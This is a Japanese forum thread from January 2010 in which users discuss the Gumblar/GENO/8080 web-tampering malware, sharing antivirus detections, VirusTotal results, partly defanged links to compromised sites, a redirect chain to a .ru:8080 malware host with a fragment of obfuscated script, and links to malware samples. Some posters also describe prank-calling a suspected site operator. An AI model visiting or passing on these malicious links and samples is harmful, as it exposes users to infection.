0823名無しさん@お腹いっぱい。
2010/01/08(金) 22:12:44日本伸銅協会
0824名無しさん@お腹いっぱい。
2010/01/08(金) 22:14:12Adobe互換ソフトも必ずしも安全ではないと何度言えば
0825sage ◆sage/xLnlI
2010/01/08(金) 22:14:12( ゚д゚)
(つд⊂)ゴシゴシ
(;゚д゚)
(つд⊂)ゴシゴシ
_, ._
(;゚ Д゚) …?!
( ゚д゚ )フラグビンビン[ピー]ビンビン
0826名無しさん@お腹いっぱい。
2010/01/08(金) 22:15:46まずはOSの入れなおしからどうぞ
0827名無しさん@お腹いっぱい。
2010/01/08(金) 22:17:090828sage ◆sage/xLnlI
2010/01/08(金) 22:18:14OS windows7
メモリー 4GB
CPU AMD アスロン64X2 2.7GHz
ADOBE 8.12
flash 最新
JRE ? 12
0829名無しさん@お腹いっぱい。
2010/01/08(金) 22:20:24アンインスコしない手はない
0830名無しさん@お腹いっぱい。
2010/01/08(金) 22:20:41ウイルス踏んでもいないのにクリーンインストールかよ・・・
アレなんだよ・・・NICのドライバと競合して入れられない俺のマシン
アンチウイルスと犬猿の仲・・・
0831sage ◆sage/xLnlI
2010/01/08(金) 22:43:00俺はJREがないと2chが見れませんので無理でつ
0832名無しさん@お腹いっぱい。
2010/01/08(金) 22:54:18ドライバソフトの更新ないの?
0833名無しさん@お腹いっぱい。
2010/01/08(金) 22:58:13最近更新されていないお・・・
バージョンを色々と変えてみたが・・・ムリポ
0834名無しさん@お腹いっぱい。
2010/01/08(金) 22:59:21あれ、教えてもずっと放置してたのにいつの間にかサーバ落としたのか
0835名無しさん@お腹いっぱい。
2010/01/08(金) 23:02:57ここ見てたんですかねぇ。。。
0836名無しさん@お腹いっぱい。
2010/01/08(金) 23:10:450837名無しさん@お腹いっぱい。
2010/01/08(金) 23:26:13ケータイに感染するウィルスなかったっけ
0838名無しさん@お腹いっぱい。
2010/01/08(金) 23:31:360839名無しさん@お腹いっぱい。
2010/01/08(金) 23:42:19/*LGPL*/ ですね
0840名無しさん@お腹いっぱい。
2010/01/08(金) 23:53:34俺最強
0841名無しさん@お腹いっぱい。
2010/01/08(金) 23:54:370842名無しさん@お腹いっぱい。
2010/01/08(金) 23:58:010843名無しさん@お腹いっぱい。
2010/01/08(金) 23:58:460844名無しさん@お腹いっぱい。
2010/01/09(土) 00:01:550845名無しさん@お腹いっぱい。
2010/01/09(土) 00:04:340846名無しさん@お腹いっぱい。
2010/01/09(土) 00:05:04おっさんA「ガンプラって怖いらいな、HP見ただけで・・・」
おっさんB「ブログ見ただけでも感染するって書いてあるぞ・・・」
もれ心の中で「それ、ガンプラじゃなくてガンブラーだから・・・
しかも、仕事中にどんなところ覗いているんだよ・・・おっさんども。」
0847名無しさん@お腹いっぱい。
2010/01/09(土) 00:11:230848名無しさん@お腹いっぱい。
2010/01/09(土) 00:12:14ttp://ux.getuploader.com/virus/
0849名無しさん@お腹いっぱい。
2010/01/09(土) 00:23:37鳩山首相のtwitter偽アカウントやってたメガネ王という人のブログにmooterのブログパーツがあって、
年末ちょっと騒動になった
0850名無しさん@お腹いっぱい。
2010/01/09(土) 00:45:47セキュリティのきっちりしたデータセンターに鯖が置いてあって、
更新時なんかは許可された端末からのみVPN経由でできるよう
にしてあるのが常識だと思ってたんだけど、意外とみんなそうじゃないんだね・・・
0851名無しさん@お腹いっぱい。
2010/01/09(土) 00:55:480852名無しさん@お腹いっぱい。
2010/01/09(土) 00:57:530853名無しさん@お腹いっぱい。
2010/01/09(土) 01:22:32それやってもやられるものはやられる
0854名無しさん@お腹いっぱい。
2010/01/09(土) 01:32:40そうそう
JREのバージョンを上げるって対策だけはおいそれと出来ないから困ってる
0855名無しさん@お腹いっぱい。
2010/01/09(土) 01:35:38色々不具合が起きるケースが多いわな、確かに。
0856名無しさん@お腹いっぱい。
2010/01/09(土) 01:36:430857名無しさん@お腹いっぱい。
2010/01/09(土) 02:00:56JDK側は開発に合わせるとかもできなくもない気がする
試してないけどね
お絵かきしたい人は諦めてくれ
0858名無しさん@お腹いっぱい。
2010/01/09(土) 02:09:23ttp://www.jpcert.or.jp/pr/2010/pr100001.txt
インシデントの届出
ttps://form.jpcert.or.jp/
記入例
ttp://www.jpcert.or.jp/pr/2010/form.png
結構適当でいいらしい。
0859名無しさん@お腹いっぱい。
2010/01/09(土) 02:44:26JAVAのバージョンチェックしたらJAVAそのものが入っていなかったでござる
0860名無しさん@お腹いっぱい。
2010/01/09(土) 03:01:000861名無しさん@お腹いっぱい。
2010/01/09(土) 03:02:43あれ? 俺書いたっけ・・・
とりあえずJAVA入れてきたw
0862名無しさん@お腹いっぱい。
2010/01/09(土) 03:03:16■三栄コーポレーション(2010年1月8日発表)
告知:「モッフル」ホームページの改ざんとウイルス被害に関する報告とお詫び[PDF]
いま出すお詫びがPDFでなくてもよかろうもん
0863名無しさん@お腹いっぱい。
2010/01/09(土) 03:25:32なかったもんをなぜわざわざ入れるのだ
0864名無しさん@お腹いっぱい。
2010/01/09(土) 03:54:58しかしネットサーフィンも電脳サバイバルの様相を呈してきた感じ・・・
0865名無しさん@お腹いっぱい。
2010/01/09(土) 04:01:520866名無しさん@お腹いっぱい。
2010/01/09(土) 04:07:55してるよ
0867名無しさん@お腹いっぱい。
2010/01/09(土) 06:00:54tp://megalodon●jp/2010-0107-1225-07/ameblo●jp/caetla-2008/entry-10427328482●html
0868名無しさん@お腹いっぱい。
2010/01/09(土) 06:42:22(4) JRE(Java Runtime Environment)を最新版に更新する
JRE入れてなかったら問題無い?
それともJRE入れて最新版にしとかないと駄目?
0869名無しさん@お腹いっぱい。
2010/01/09(土) 06:44:050870名無しさん@お腹いっぱい。
2010/01/09(土) 06:49:170871名無しさん@お腹いっぱい。
2010/01/09(土) 06:58:22似通った文章にみえた
指南してる人いるのかな
0872名無しさん@お腹いっぱい。
2010/01/09(土) 07:14:49avast使ってる人はそれでも良いんじゃないか
みんなが使ってると思ってるのかな
0873名無しさん@お腹いっぱい。
2010/01/09(土) 07:24:09きゅいきゅい きゅいーん!
0874名無しさん@お腹いっぱい。
2010/01/09(土) 07:29:240875名無しさん@お腹いっぱい。
2010/01/09(土) 07:36:56なんでもいいけどアンチウイルスのupdateをまてばいいのさ
0876名無しさん@お腹いっぱい。
2010/01/09(土) 07:48:38馬鹿havastのスレいけよ
0877名無しさん@お腹いっぱい。
2010/01/09(土) 07:49:56脆弱性の対処しとけば良いだけだ
avastなんかに期待するな
0878名無しさん@お腹いっぱい。
2010/01/09(土) 07:56:01検索窓のパーツに含まれてるJavaScriptファイルがやられてたので
設置してたサイトは改ざんサイト同然。
「ノートン警察」のブログパーツもJavaScriptファイルだから同じね。
>>744
>期間:2009年12月25日1時〜12月28日18時30分
改ざんファイルのタイムスタンプは 2009/12/24 1:30(GMT)周辺だったんだが、
どういう計算すると12月25日1時になるんだろ。
2009/12/26 2:47:54(GMT)に、検索窓のJavaScriptファイルだけ直したみたい。
ほかの奴のは29日夕方だけど、28日18時30分に閉鎖したってことかな
0879名無しさん@お腹いっぱい。
2010/01/09(土) 09:16:47このページ改竄されてね?js検知すんぞ
0880名無しさん@お腹いっぱい。
2010/01/09(土) 09:28:19ttp://www●note-pc●biz/js/rollover●js
rollover.jsにぐぬーたんがいるおっおww
0881sage ◆sage/xLnlI
2010/01/09(土) 09:37:400882名無しさん@お腹いっぱい。
2010/01/09(土) 09:44:13aguseのカスペが反応しないんだが新種かねぇ?
0883sage ◆sage/xLnlI
2010/01/09(土) 09:45:200884sage ◆sage/xLnlI
2010/01/09(土) 09:46:02検体です
(踏んだら危険)
0885名無しさん@お腹いっぱい。
2010/01/09(土) 09:50:52ほい
http://www.virustotal.com/analisis/cf4b42203397f1b333f0cf763a5aa081c3a8abc226af58e861f23880ac8c0a78-1262998068
0886名無しさん@お腹いっぱい。
2010/01/09(土) 09:53:040887名無しさん@お腹いっぱい。
2010/01/09(土) 09:55:41テンキュー
0888sage ◆sage/xLnlI
2010/01/09(土) 10:02:17コード
が
書いてある
だけ
です
0889名無しさん@お腹いっぱい。
2010/01/09(土) 10:15:30両者とも最新版だお
0890名無しさん@お腹いっぱい。
2010/01/09(土) 10:17:313万ファイルぐらいでスキャン終了されて
system32のログとかローカルの中のtmpとかロック扱いで中身見てもらえないんだが
これ本当に大丈夫なんだろうか
マカフィーは今日手動更新してもファイル更新できないし
FTP使った後、一時間以上サイト改ざんされなければもう白でいいのか?
0891名無しさん@お腹いっぱい。
2010/01/09(土) 10:33:21>踏んでみた→Adobe ReaderとJavaが起動
これアウトじゃね?
pdf開いてないのにReaderは普通起動しないだろ…
0892名無しさん@お腹いっぱい。
2010/01/09(土) 10:38:02ttp://www.keiyu.com/doc/pdflink.htm
embedでPDFを埋め込めるお
0893名無しさん@お腹いっぱい。
2010/01/09(土) 10:41:09* ロールオーバーを設定する画像にクラス名「over」を指定
* ロールオーバー時に表示するための画像ファイル名後ろに「_over」をつける
/*------------------------------------------------------------*/
0894名無しさん@お腹いっぱい。
2010/01/09(土) 10:44:13仮想環境でもないWindowsであんまりチャレンジしない方がいいぞ
0895名無しさん@お腹いっぱい。
2010/01/09(土) 10:58:13scriptが埋め込むURLにアクセスしても0byteが帰ってくるだけで
何も落ちてこない。
windows使ってないから?リファラ見てる?
0896名無しさん@お腹いっぱい。
2010/01/09(土) 11:01:14悪質なコードを取り除きPDFを作成次第配布するお
0897名無しさん@お腹いっぱい。
2010/01/09(土) 11:04:08ReaderはバージョンだけじゃなくJavaScript機能オフまでが対策
>>890
1時間程度じゃ改ざんされない可能性もある
心配ならOS入れなおせよ
0898名無しさん@お腹いっぱい。
2010/01/09(土) 11:05:20リファラも見てるかもしれんが
少なくともUserAgentは見てるんじゃね
0899名無しさん@お腹いっぱい。
2010/01/09(土) 11:09:21>>896のようにPoCをちょっといじったものなら別スレで喜んで張ってた奴がいる
avast!のWebシールドでも反応しない新ガンブラーが登場
http://tsushima.2ch.net/test/read.cgi/news/1262886266/
wgetで普通に取れる ただこれは今回実際に攻撃に使われてるものではない
0900名無しさん@お腹いっぱい。
2010/01/09(土) 11:10:07> Adobe ReaderとJavaが起動したが結局何も起こらず
何も起きてないことをどうやって確認したんだ?
0901名無しさん@お腹いっぱい。
2010/01/09(土) 11:12:10ファイル操作系のAPIを全てフックして監視していたお
念のためにディスクイメージも比較した
結論:特に変化無し
0902名無しさん@お腹いっぱい。
2010/01/09(土) 11:13:030903名無しさん@お腹いっぱい。
2010/01/09(土) 11:14:28APIフックって自作?
何かツールあるの?
0904名無しさん@お腹いっぱい。
2010/01/09(土) 11:15:542ちゃんがやられる可能性もあるの?
0905名無しさん@お腹いっぱい。
2010/01/09(土) 11:16:01自作だお
既製品はシラネ
0906名無しさん@お腹いっぱい。
2010/01/09(土) 11:18:240907名無しさん@お腹いっぱい。
2010/01/09(土) 11:19:05俺に作り方教えてくれ
0908名無しさん@お腹いっぱい。
2010/01/09(土) 11:24:54言語は?
0909名無しさん@お腹いっぱい。
2010/01/09(土) 11:26:26砂箱つかえよ
Sandboxieとか
0910名無しさん@お腹いっぱい。
2010/01/09(土) 11:29:28一応Cできる。カーネルの知識はない。
0911名無しさん@お腹いっぱい。
2010/01/09(土) 11:30:23要するにファイル操作系のAPIを全てフックして監視すればいいんじゃね?
0912名無しさん@お腹いっぱい。
2010/01/09(土) 11:49:27古いreaderとか入れろよ
0913名無しさん@お腹いっぱい。
2010/01/09(土) 11:59:33パソコンお直し隊 電話番号
http://www.google.co.jp/search?hl=ja&source=hp&q=%E3%83%91%E3%82%BD%E3%82%B3%E3%83%B3%E3%81%8A%E7%9B%B4%E3%81%97%E9%9A%8A+%E9%9B%BB%E8%A9%B1%E7%95%AA%E5%8F%B7&lr=&rlz=1R2ADBR_ja&aq=5mr&oq=%E3%81%8A%E3%81%AA%E3%81%8A%E3%81%97%E3%81%9F%E3%81%84
2010-1-9(土)11:46電凸
中国人?が出る
よく分からんが、むかついたので完了とする
これ以降は、恣意的にウイルスを拡散しているものと判断
0914名無しさん@お腹いっぱい。
2010/01/09(土) 12:11:37凸電した
お宅のHPをみたらPCぶっ壊れたと言ってやった
0915名無しさん@お腹いっぱい。
2010/01/09(土) 12:40:52HEUR:Exploit.Script.Generic
カスペルスキー
ジェネリックで検知
0916名無しさん@お腹いっぱい。
2010/01/09(土) 13:08:28ここはもう何も落としてこないな
単にアンチウィルスが反応するだけで、pdfも送り返して来ない
0917名無しさん@お腹いっぱい。
2010/01/09(土) 13:31:33IP変えて(串可)どうぞ。
0918名無しさん@お腹いっぱい。
2010/01/09(土) 13:33:340919名無しさん@お腹いっぱい。
2010/01/09(土) 13:39:48それは軽く死ねる
0920名無しさん@お腹いっぱい。
2010/01/09(土) 13:58:01いい加減にしとけや
0921名無しさん@お腹いっぱい。
2010/01/09(土) 14:56:04というか監視は普通にProcess Monitorとかでできるんじゃないか
0922名無しさん@お腹いっぱい。
2010/01/09(土) 15:02:500923名無しさん@お腹いっぱい。
2010/01/09(土) 15:04:430924名無しさん@お腹いっぱい。
2010/01/09(土) 15:45:45それだと表示されない関数があるお
Wiresharkと適当な実装のAPIフックプログラムを併用しているお
何故かVistaでフック出来ない件
教えてエロい人
0925名無しさん@お腹いっぱい。
2010/01/09(土) 15:47:440926名無しさん@お腹いっぱい。
2010/01/09(土) 15:52:22死ね
0927名無しさん@お腹いっぱい。
2010/01/09(土) 15:57:020928名無しさん@お腹いっぱい。
2010/01/09(土) 16:01:220929名無しさん@お腹いっぱい。
2010/01/09(土) 16:06:390930名無しさん@お腹いっぱい。
2010/01/09(土) 16:10:570931名無しさん@お腹いっぱい。
2010/01/09(土) 16:13:57プラグインの起動まではしているがその後こけてるということか
具体的にどういうコードが動いてるかは見てる?
0932名無しさん@お腹いっぱい。
2010/01/09(土) 16:22:300933名無しさん@お腹いっぱい。
2010/01/09(土) 18:57:52および製品情報サービスを申し込まれた方にお送りしております。
「Gumblar(ガンブラー)」関連ウイルスにご注意ください
ソースネクスト株式会社
いつもソースネクスト製品をご愛用いただき、誠にありがとうございます。
さて、現在、改ざんされたサイトを閲覧しただけで感染する「Gumblar(ガンブラー)」と
その亜種が流行しています。念のため、利用されているウイルス対策ソフトの対応状況を
確認されることをおすすめいたします。
なお、ソースネクストの「ウイルスセキュリティ」は、これらのウイルスに対応済みですので、
必要な方はこの機会にご検討ください。
セキュリティ製品のお客様専用サイト
http://mail.sourcenext.info/c/arzdfpimb1tdwKab
「ウイルスセキュリティ」のお買い求めはこちら
eSHOP価格4,480円 (標準価格 4,980円) 10%OFF
http://mail.sourcenext.info/c/arzdfpimb1tdwKac
今後ともソースネクスト製品を末永くお使いいただきますようお願い申し上げます
0934名無しさん@お腹いっぱい。
2010/01/09(土) 19:06:490935名無しさん@お腹いっぱい。
2010/01/09(土) 19:07:25バスターでサクサク快適アルヨー
0936名無しさん@お腹いっぱい。
2010/01/09(土) 19:33:260937名無しさん@お腹いっぱい。
2010/01/09(土) 20:01:59FTP通信そのものを見てるとしたら繋いだFTP鯖だけだよね
繋いでないのに改竄されてる・一つ繋いだら他のFTP鯖のサイトも改竄されたと言ってる人はどうなるの?
繋いだのに忘れてるのかな?
0938名無しさん@お腹いっぱい。
2010/01/09(土) 20:03:17FTPクライアントにパスが保存してあるって
それを読み取られてるんじゃね?
0939名無しさん@お腹いっぱい。
2010/01/09(土) 20:03:580940名無しさん@お腹いっぱい。
2010/01/09(土) 20:21:570941名無しさん@お腹いっぱい。
2010/01/09(土) 20:23:26genoを解析したところによると一部のFTPクライアントの設定を読み取って改ざんするとなってた。
0942名無しさん@お腹いっぱい。
2010/01/09(土) 20:31:270943名無しさん@お腹いっぱい。
2010/01/09(土) 20:55:44Genoとは別物だけどね
FTPクライアントの設定ファイルは見てるのは事実
0944名無しさん@お腹いっぱい。
2010/01/09(土) 20:59:43http://tsushima.2ch.net/test/read.cgi/news/1263036497/
0945名無しさん@お腹いっぱい。
2010/01/09(土) 21:04:370946名無しさん@お腹いっぱい。
2010/01/09(土) 22:01:39JS:Illredir-C [Trj]
0947名無しさん@お腹いっぱい。
2010/01/09(土) 22:32:53結果: 10/41 (24.4%)
http://www.virustotal.com/jp/analisis/6fa28b2165d271842128a6936c19935674b51ad249d0da8aff224779eeee6bb6-1263043815
0948名無しさん@お腹いっぱい。
2010/01/09(土) 22:46:59新たにavastが加わったくらいだ
結果: 6/41 (14.64%)
http://www.virustotal.com/jp/analisis/1290321bf9235bf874ba59b71249afe3219f615731ce5cc1bdfdb0bde1b9cdd3-1263044674
0949名無しさん@お腹いっぱい。
2010/01/09(土) 22:52:180950名無しさん@お腹いっぱい。
2010/01/09(土) 22:54:150951名無しさん@お腹いっぱい。
2010/01/09(土) 23:41:120952名無しさん@お腹いっぱい。
2010/01/09(土) 23:42:47100109-0の定義データでavast!がLGPLに対応したみたいだ
手持ちの12個の検体すべてに反応するようになった
0953名無しさん@お腹いっぱい。
2010/01/09(土) 23:48:08ttp://2sen.dip.jp/cgi-bin/upgun/up1/source/up36231.htm
0954名無しさん@お腹いっぱい。
2010/01/09(土) 23:55:240955名無しさん@お腹いっぱい。
2010/01/09(土) 23:57:23これはなんだ?
NoScript入れてたからどうもないと思うが
0956名無しさん@お腹いっぱい。
2010/01/10(日) 00:00:120957名無しさん@お腹いっぱい。
2010/01/10(日) 00:08:33NoScript解いたけどどうもならないな・・・
0958名無しさん@お腹いっぱい。
2010/01/10(日) 00:27:12http://www29.atwiki.jp/geno/
の管理人だけど、更新したほうがいい?
正直今頃になって大騒ぎするとは思わなかったわ
0959名無しさん@お腹いっぱい。
2010/01/10(日) 00:31:18更新してくれるとありがたい
0960名無しさん@お腹いっぱい。
2010/01/10(日) 00:31:43当たり前だろ。出来ないんだったら
古い情報垂れ流して混乱招くからサイトごと消せ
0961名無しさん@お腹いっぱい。
2010/01/10(日) 00:33:338080系がそのGENOウイルスと一緒だと思ってて
そこに書いてある対策とか薦めてる人が結構いるから
せめて注意書きくらいはしといた方がいいんじゃない?
0962名無しさん@お腹いっぱい。
2010/01/10(日) 00:39:06感染の確認方法と復帰方法は違う種類なので役に立たないと
いうのは書いておいた方がいいかも
0963名無しさん@お腹いっぱい。
2010/01/10(日) 00:42:23http://baidu-com●fandango●com●linkedin-com●webdirectbroker●ru:8080/google●co●th/google●co●th/google●com/17173●com/58●com/
糞長すぎ乙
0964958
2010/01/10(日) 00:52:25http://www29.atwiki.jp/geno/pages/19.html
これは今も有効な対策?
0965名無しさん@お腹いっぱい。
2010/01/10(日) 00:54:028080以下は何種類からかランダムで決まるから意味なし乙
それなら.ru:8080/をブロックする方がマシ
0966名無しさん@お腹いっぱい。
2010/01/10(日) 00:55:06うん
0967名無しさん@お腹いっぱい。
2010/01/10(日) 00:57:15とっても乙
0968名無しさん@お腹いっぱい。
2010/01/10(日) 01:11:09↓リダイレクト
http://baidu-com●fandango●com●linkedin-com●webdirectbroker●ru:8080/google●co●th/google●co●th/google●com/17173●com/58●com/
↓リダイレクト
http://baidu-com●fandango●com●linkedin-com●webdirectbroker●ru:8080/index●php?ys
↓/pics/jquery.jx→eval("Aapdk2='M';");
現在人力デコードなう ←今ココ
0969名無しさん@お腹いっぱい。
2010/01/10(日) 01:24:10これは何なの?
0970名無しさん@お腹いっぱい。
2010/01/10(日) 01:26:12ガンプラの親玉
0971名無しさん@お腹いっぱい。
2010/01/10(日) 01:27:47超乙
それはいまも必要な情報でございます
0972名無しさん@お腹いっぱい。
2010/01/10(日) 01:31:320973972
2010/01/10(日) 01:35:01ERROR:新このホストでは、しばらくスレッドが立てられません。
またの機会にどうぞ。。。
orz
ダメだったのでテンプレ貼り
【Gumblar/GENO】Web改竄ウイルス総合スレ2【8080】
改ざんされたWebページを経由して感染するウイルスの情報・対策スレです
ウイルス情報・対策方法・脆弱性情報などをお願いします
一部のウイルス被害が増加して混乱するようなら別スレを立てて誘導してください
現時点でGumblar(GENO)、8080(『/*LGPL*/』『/*GNU GPL*/』『/*CODE1*/』)
JustExploitなどのインジェクションが流行しています
基本的な対策としてセキュリティ・アップデートを欠かさないようにしましょう
*** 危険と思われるサイトのアドレスはそのまま貼らないで「.」を「●」に変えてください ***
*** 感染した場合はクリーンインストールと安全なPCからのパスワードの変更を推奨します ***
【前スレ】
【Gumblar/GENO】Web改竄ウイルス総合スレ【8080】
http://pc11.2ch.net/test/read.cgi/sec/1261855221/
【関連スレ】
GENOウイルススレ ★23
http://pc11.2ch.net/test/read.cgi/sec/1259607683/
0974名無しさん@お腹いっぱい。
2010/01/10(日) 01:37:07逝ってみる。
2以降はよろ。
0975名無しさん@お腹いっぱい。
2010/01/10(日) 01:38:37【Gumblar/GENO】Web改竄ウイルス総合スレ2【8080】
http://pc11.2ch.net/test/read.cgi/sec/1263055073/
0976名無しさん@お腹いっぱい。
2010/01/10(日) 01:41:23乙
0977名無しさん@お腹いっぱい。
2010/01/10(日) 01:42:11おつなんだから
0978名無しさん@お腹いっぱい。
2010/01/10(日) 01:42:52乙
貼っておきました
0979名無しさん@お腹いっぱい。
2010/01/10(日) 01:43:55乙でした。
0980名無しさん@お腹いっぱい。
2010/01/10(日) 01:44:440981名無しさん@お腹いっぱい。
2010/01/10(日) 01:46:22【鑑定目的禁止】検出可否報告スレ13
http://pc11.2ch.net/test/read.cgi/sec/1258817697/
0982名無しさん@お腹いっぱい。
2010/01/10(日) 01:48:22検出可否報告スレにならロダもあるし提出もしてくれそうで一石二鳥
解凍パスワードを"infected"か "virus"にしてうp
0983名無しさん@お腹いっぱい。
2010/01/10(日) 01:53:14【Gumblar/GENO】Web改竄ウイルス総合スレ2【8080】
http://pc11.2ch.net/test/read.cgi/sec/1263055073/
0984名無しさん@お腹いっぱい。
2010/01/10(日) 01:54:400985名無しさん@お腹いっぱい。
2010/01/10(日) 02:00:29http://www.mag-x.com/blog/index.html
0986名無しさん@お腹いっぱい。
2010/01/10(日) 02:05:28ttp://www●mag-x●com/blog/cat16/
/*LGPL*/
0987名無しさん@お腹いっぱい。
2010/01/10(日) 02:05:450988名無しさん@お腹いっぱい。
2010/01/10(日) 02:06:180989名無しさん@お腹いっぱい。
2010/01/10(日) 02:09:040990名無しさん@お腹いっぱい。
2010/01/10(日) 02:12:58実施中の緊急メンテナンス終了予定のお知らせ
対応早いね
0991名無しさん@お腹いっぱい。
2010/01/10(日) 02:16:09他のページが放置っぽい。。。
0992名無しさん@お腹いっぱい。
2010/01/10(日) 02:17:10再発する
0993名無しさん@お腹いっぱい。
2010/01/10(日) 02:20:34リダイレクトが2回あって1回目でG dataが反応する
0994名無しさん@お腹いっぱい。
2010/01/10(日) 02:22:54このWebページはウイルスに感染しています
次のウイルスが見つかりました: Trojan-Downloader.JS.Agent.ewo
情報:
2:21:57
Kaspersky Internet Security 2010
0995名無しさん@お腹いっぱい。
2010/01/10(日) 02:36:34これ一ブログじゃなくて収容してるブログ全体にウイルスコード入れられたのか
0996名無しさん@お腹いっぱい。
2010/01/10(日) 02:37:14なんだこれ新型か?
0997名無しさん@お腹いっぱい。
2010/01/10(日) 02:37:38ほんとだ
http://www●mag-x●com/ ←302だけどボディに/*LGPL*/
↓
http://www●mag-x●com/pc●html
↓
http://www●mag-x●com/blog/index●html
0998名無しさん@お腹いっぱい。
2010/01/10(日) 02:40:30http://www.google.co.jp/search?q=site%3Awww.mag-x.com
これはひどいなあ
0999名無しさん@お腹いっぱい。
2010/01/10(日) 02:42:04うはw収容サイトにもれなく入ってる
1000名無しさん@お腹いっぱい。
2010/01/10(日) 02:42:2610011001
Over 1000Threadもう書けないので、新しいスレッドを立ててくださいです。。。
レス数が1000を超えています。これ以上書き込みはできません。